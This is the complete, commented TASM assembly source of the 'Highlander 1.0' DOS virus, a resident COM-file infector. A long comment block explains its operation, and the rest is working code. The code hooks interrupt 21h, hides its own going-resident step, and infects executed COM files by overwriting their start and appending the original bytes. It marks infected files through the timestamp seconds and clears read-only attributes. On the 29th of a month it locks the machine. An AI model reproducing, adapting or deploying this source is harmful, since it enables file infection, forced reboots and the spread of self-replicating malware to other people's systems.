;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
ORG 100h
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
versn:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
push ax ;store all registers subject to change
push bx
push cx
push es
push si
push di
push dx
push ds
push cs ;store the code segment so it can be used
push cs ;to set the ds and es registers
pop ds ;set ds to same as cs
pop es ;set es to same as cs
mov dx,080h ;set dx to offset 080h
mov ah,01ah ;set ah to create DTA
int 21h ;create DTA at 080h (normal DTA area)
pop ds ;set ds to original ds
pop dx ;set dx to original dx (ds:dx is used to
;point to the path and filename of the
;program to be executed)
push dx ;store these values back
push ds
xor cx,cx ;zero cx
mov ah,04eh ;set ah to search for filename match
int 21h ;search for filename (this is primarily
;done to setup data in the DTA so that it
;can be checked easier than making a
;number of individual calls)
push es ;store es (same as cs)
pop ds ;set ds to same as es and cs
cmp [byte 087h],'D' ;check for 'D' as seventh letter in file
jne j5
jmp endvirus ;if 'D' is 7th letter, dont infect
j5:
mov si,offset data3+0100h ;set source of bytes to compare
mov di,089h ;set destination of bytes to compare
mov cx,3 ;number of bytes to compare
cld ;compare forward
repe cmpsb ;compare bytes (check to see if file's
;extension is COM)
je j1
jmp endvirus ;not a COM file. Dont infect
j1:
mov bx,[word 009ah] ;set bx to length of file
cmp bx,1024 ;is length > 1024?
jae j2 ;yes, continue with checks
jmp endvirus ;no, dont infect
j2:
cmp bx,62000 ;is length < 62000?
jbe j3 ;yes, continue with checks
jmp endvirus ;no, dont infect
j3:
mov ax,[word 096h] ;set ax to file's time stamp
and ax,0000000000011111b ;clear everything but seconds
cmp ax,0000000000010100b ;is seconds = 40?
jne j4 ;yes, continue with infection
mov ah,02ah ;no, set ah to get the date
int 21h ;get current system date
mov cx,21 ;set cx to 21
cmp dl,29 ;is the date the 29th?
je irritate ;yes, continue with irritate
jmp endvirus ;no, let program execute normally
irritate:
mov dx,offset data5+0100h ;point dx to irritating message
mov ah,09h ;set ah to write to screen
int 21h ;write message 21 times
loop irritate
iret ;xfer program control to whatever's on
;the stack (this almost guarantee's a
;lockup and a reboot)
j4:
mov ax,[word 096h] ;set ax equal to the file's time stamp
and ax,1111111111100000b ;zero the seconds portion
or ax,0000000000010100b ;set the seconds = 40
add bx,0100h ;set bx = loc for restore routine (end
;of file once its in memory)
mov [word data1+0100h],bx ;store this value in the virus
mov bx,ax ;set bx = to adjusted time stamp
pop ds ;get the original ds
push ds ;store this value back
mov ax,04300h ;set ax to get the file's attributes
;ds:dx already points to path/filename
int 21h ;get the files attributes
push cx ;push the attributes
push bx ;push the adjusted time stamp
xor cx,cx ;zero cx(attributes for normal, read/write)
mov ax,04301h ;set ax to set file attributes
int 21h ;set files attributes to normal/read/write
mov ax,03d02h ;set ax to open file
int 21h ;open file for read/write access
mov bx,ax ;mov file handle to bx
push cs ;push current code segment
pop ds ;and pop into ds (ds=cs)
mov cx,endcode-begin ;set cx equal to length of virus
mov dx,offset endcode+0100h ;point dx to end of virus in memory
mov ah,03fh ;set ah to read from file
int 21h ;read bytes from beginning of file and
;store at end of virus. Read as many bytes
;as virus is long.
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04200h ;set ax to move file pointer from begin
int 21h ;mov file pointer to start of file
mov cx,endcode-begin ;set cx = length of virus
mov dx,0100h ;point dx to start of virus
mov ah,040h ;set ah to write to file
int 21h ;write virus to start of file
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04202h ;set ax to move file pointer from end
int 21h ;mov file pointer to end of file
mov cx,checkinfect-restcode ;set cx to length of restore routine
mov dx,offset restcode+0100h ;point dx to start of restore routine
mov ah,040h ;set ah to write to file
int 21h ;write restore routine to end of file
mov cx,endcode-begin ;set cx to length of virus (length of code
;read from beginning of file)
mov dx,offset endcode+0100h ;point dx to data read from file
mov ah,040h ;set ah to write to file
int 21h ;write data read from start of file to end
;of file following restore routine
pop cx ;pop the adjusted time stamp
mov dx,[word 098h] ;mov the file date stamp into dx
mov ax,05701h ;set ax to write time/date stamp
int 21h ;write time/date stamp to file
mov ah,03eh ;set ah to close file
int 21h ;close the file
pop cx ;pop the original attributes
pop ds ;pop the original ds
pop dx ;pop the original dx
push dx ;push these values back
push ds
mov ax,04301h ;set ax to set file attributes (ds:dx now
;points to original path/filename)
int 21h ;set the original attributes back to file
endvirus: ;virus execution complete. restore original
;values for INT 21 function
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
cont: ;virus complete. restore original flags
popf
pushf
int21trap: ;this calls the original INT 21 routine
db 09ah ;opcode for a far call
nop ;blank area. the original INT 21 vector
nop ;is copied to this area
nop
nop
push ax ;after the original INT 21 routine has
;completed execution, control is returned
;to this point
push bx
pushf ;push the flags returned from the INT 21
;routine. We have to get them in the
;proper location in the stack when we
;return to the calling program
pop ax ;pop the flags
mov bx,sp ;set bx equal to the stack pointer
mov [word ss:bx+8],ax ;copy the flags to the proper location in
;the stack
pop bx ;restore bx
pop ax ;restore ax
iret ;return to calling program
signature:
db 'dex'
endcode: ;this file has been written as if it were
;a natural infection. At this point the
;virus is ended and we are at the restore
;routine. Following this is the host code
;which will be moved back to 0100h. This
;file could never actually be a natural
;infection however due to its small size
rep movsb ;start of restore routine. move host back
push cs ;set up to xfer to cs:0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;host is restored. xfer to start of host
hoststart: ;This is the host program. It consists
;merely of a simple message being displayed
jmp skipdata ;jump over message
hostmessage:
db 'The virus is now resident.$'
skipdata:
mov ah,09h ;set ah to write to screen
mov dx,offset hostmessage+0100h
;point dx to message to display
int 21h ;display message
mov ah,04ch ;set ah to terminate program
int 21h ;terminate program, return to DOS
END begin